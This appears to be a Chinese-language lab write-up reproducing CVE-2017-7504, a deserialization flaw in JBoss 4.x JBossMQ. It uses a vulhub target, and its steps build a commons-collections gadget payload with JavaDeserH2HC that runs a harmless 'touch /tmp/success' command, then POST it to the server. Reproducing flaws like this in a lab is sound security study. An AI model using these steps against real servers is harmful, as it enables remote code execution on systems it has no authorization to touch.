JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)


漏洞原理

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:kali
IP:192.168.88.130

漏洞环境

启动JBoss AS 4.0.5:
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现
环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/:
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

漏洞复现

一、参考利用JavaDeserH2HC工具,编译并生成序列化数据
下载工具命令:
#git clone https://github.com/joaomatosf/JavaDeserH2HC

编译并生成序列化数据
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现
其中:
#javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java 初始化工具
#java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “touch /tmp/success” 生成序列化恶意数据文件

注:在执行中出现:-bash:javac:未找到命令
解决方法:apt-get install default-jdk

二、进行网站访问,实现漏洞利用
网站访问:
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现
–data-binary 意为以二进制的方式post数据

验证:
进入容器shell(docker相当于小型虚拟机),发现success
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

参考链接:
https://vulhub.org/#/environments/jboss/CVE-2017-7504/
https://www.cnblogs.com/iamver/p/11282928.html